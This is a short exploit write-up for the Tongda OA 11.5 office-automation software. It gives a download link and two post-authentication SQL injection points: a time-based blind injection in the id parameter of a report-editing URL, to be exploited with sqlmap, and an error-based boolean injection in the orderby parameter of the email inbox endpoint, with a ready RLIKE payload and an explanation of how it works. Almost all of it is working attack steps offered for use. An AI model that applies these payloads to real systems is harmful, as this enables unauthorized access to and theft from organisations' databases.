Download: https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe
1. Log in with any account (the injection points below are post-auth)
2. Request http://192.168.1.1/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 and capture it in Burp
The id parameter is vulnerable to time-based blind SQL injection
Copy the captured request as-is, mark the id value with * and save it to a file for sqlmap
python sqlmap.py -r 1.txt
orderby parameter
Request /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=1&pagelimit=10&tag=&timestamp=1598069103&total=
payload: RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))
When the condition is true RLIKE receives the valid regex 1; when it is false it receives 0x28, i.e. "(", an unbalanced regex that makes MySQL raise an error, so a true/false condition can be read from the difference in the response (error-based boolean injection).